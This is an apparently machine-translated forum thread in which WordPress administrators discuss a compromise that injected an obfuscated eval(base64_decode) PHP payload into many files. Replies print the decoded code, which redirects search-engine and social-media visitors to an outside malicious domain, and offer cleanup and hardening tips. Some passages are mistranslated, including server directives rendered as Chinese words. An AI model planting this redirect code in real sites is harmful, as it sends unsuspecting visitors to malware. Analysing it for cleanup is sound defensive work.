Php WordPress网站综合黑客攻击

我们为客户运行的WordPress网站已经被压缩，并试图确定他们是如何进入的。似乎他们已经将代码注入到每个WP核心文件、所有主题文件和只有少数几个选择插件文件中

他们使用的代码是：

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

以前有人见过或听说过吗？有人知道这是怎么发生的吗？所有WP文件权限都设置为建议的级别

---

谢谢你的时间。

前几天我遇到了这个问题，发现sed在清理垃圾方面非常有用。它将自己附加到每一个打开的PHP标记上，并且经常将代码放在行的末尾，因此需要仔细配置

我相信这是我使用的命令，但要小心，这毕竟是

sed

；-）

---

那么，下面的代码将您的用户重定向到黑名单恶意软件站点？这就是你所经历的吗

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
            header("Location: http://costabrava.bee.pl/");
            exit();
            }
        }
    }
}

您的Wordpress版本可能易受XSS攻击。这个链接讨论它。

---

您使用的是哪个版本？

我见过的最常见的情况是，人们将所有文件和文件夹设置为777。如果必须对wp content/uploads文件夹执行此操作，请确保其中有阻止脚本执行的.htaccess指令。您的文件和文件夹应具有运行所需的最低权限（文件644，文件夹755）

您还必须阅读这些WP链接中的所有说明，以彻底清理您的安装并防止代码注入到WP核心文件或模板文件中：查看并告诉您的主机并更改所有密码。也可能更换主机；某些共享主机比其他主机更易受攻击

这并不总是有帮助，因为它取决于服务器和web主机的总体参数，在廉价的共享主机上，这些参数可能会使它们易受攻击，但您可以尝试使用这些参数来保护.htaccess和wp-config.php：

<Files .htaccess>
order deny,allow
deny from all
</Files>

<Files wp-config.php>
order allow,deny
deny from all
</Files>

命令拒绝，允许
全盘否定
命令允许，拒绝
全盘否定

---

在.htaccess.

中，我遇到了完全相同的问题

我猜这个网站是通过这些小部件感染的，因为我使用了一个允许执行PHP代码的插件

我的最佳解决方案是：

• 消除可疑的小部件
• 查看一个受感染文件的时间和日期（我的案例：header.php）
• 清除所有受感染的文件（在我的情况下，我有站点的备份）
• 在日志文件中搜索当时的可疑IP（搜索已找到 黑名单上的IP）
• 安装一个插件以禁止可疑IP

---

从那一刻起，问题就消失了。

我所知道的是，Anonymous上周声称，他们在3.2.1版中发现了一个漏洞。。。因此，如果3.2.1是您正在使用的版本，您可能希望更新到当前版本（3.3.1）…黑客尝试发生时，我正在运行3.3.1。它破坏了编辑器功能，这太糟糕了，但我同意这是防止被黑客攻击的唯一方法。我还可以指出，这不是服务器上唯一的站点，作为1&1共享托管帐户，整个托管帐户中的每个php文件都被此代码“感染”。这是3.3.1。共享主机帐户上的所有其他站点也已被压缩，包括Magento安装。这将是一个有趣的下午！我已经尝试过了，它删除了代码，但破坏了我的WP安装的其余部分：（T_ELSE和SWITCHHi上有解析错误。可以使正则表达式更具体，以便它只针对正确的字符串-可能在第一个括号后插入“base64”再试一次？

<Files .htaccess>
order deny,allow
deny from all
</Files>

<Files wp-config.php>
order allow,deny
deny from all
</Files>